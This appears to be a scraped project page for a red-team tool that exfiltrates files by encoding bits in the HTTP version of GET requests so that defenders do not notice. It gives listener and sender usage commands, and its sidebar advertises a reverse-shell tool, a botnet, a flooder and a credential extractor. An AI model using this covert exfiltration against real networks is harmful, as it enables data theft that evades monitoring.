Exfiltrate files using the HTTP protocol version ("HTTP/1.0" is a 0 and "HTTP/1.1" is a 1)

Last update: Apr 30, 2022

Related tags

Overview

http-protocol-exfil

Use the HTTP protocol version to send a file bit by bit ("HTTP/1.0" is a 0 and "HTTP/1.1" is a 1). It uses GET requests so the Blue Team would only see the requests to your IP address. However, it takes a long time to send bigger files, for example it needs 1 hour to send 200 KB, and the amount of requests would be very high (8 times the number of bytes of the file).

Create listener

To run the listener use listener.py with one optional argument: the port it will be listening in.

python3 listener.py [PORT]

Example:

python3 listener.py 8080

Send a file

To send a file use sender.py with two mandatory arguments: the file path and the url of the listener; and one optional argument: the name of the file created remotely (if not used, the name of the input file is used).

python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]

Example:

python3 sender.py -u "http://127.0.0.1:8080" -i test.txt -o updated_test.txt

Example

First the file is sent:

If the variable debug is set to True (it is by default) you can see the binary values in the listener log messages:

The new file is created with the content of the input file:

Motivation

I think (I am not sure) I read someone on Twitter who claimed to have used this to exfiltrate data and I liked the idea, if you are that person let me know.

Serves some data over HTTP, once. Based on the built-in Python module http.server

serve-me-once Serves some data over HTTP, once. Based on the built-in Python module http.server.

2 Jan 6, 2022

NetMiaou is an crossplatform hacking tool that can do reverse shells, send files, create an http server or send and receive tcp packet

5 Oct 5, 2022

Exfiltrate files using the HTTP protocol version ("HTTP/1.0" is a 0 and "HTTP/1.1" is a 1)

Related tags

Overview

http-protocol-exfil

Create listener

Send a file

Example

Motivation

You might also like...

Serves some data over HTTP, once. Based on the built-in Python module http.server

NetMiaou is an crossplatform hacking tool that can do reverse shells, send files, create an http server or send and receive tcp packet

A library for interacting with APNs and VoIP using HTTP/2.

An improved version of the original AutoDD

BibleNotifyDesktop - Desktop version of Bible Notify

Take a list of domains and probe for working HTTP and HTTPS servers

Python 3 tool for finding unclaimed groups on Roblox. Supports multi-threading, multi-processing and HTTP proxies.

QUIC and HTTP/3 implementation in Python

This tools just for education only - Layer-7 or HTTP FLOODER

Releases(1.0)

1.0(Oct 23, 2021)

Owner

Ricardo Ruiz

msgspec is a fast and friendly implementation of the MessagePack protocol for Python 3.8+

🐛 Self spreading Botnet based on Mirai C&C Arch, spreading through SSH and Telnet protocol.

Query protocol and response

libsigrok stacked Protocol Decoder for TPM 2.0 transactions from an SPI bus. BitLocker Volume Master Key (VMK) are automatically extracted.

boofuzz: Network Protocol Fuzzing for Humans

Free,Cross-platform,Single-file mass network protocol server simulator

A protocol or procedure that connects an ever-changing IP address to a fixed physical machine address

A tiny end-to-end latency testing tool implemented by UDP protocol in Python 📈 .

Fast and configurable script to get and check free HTTP, SOCKS4 and SOCKS5 proxy lists from different sources and save them to files

This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.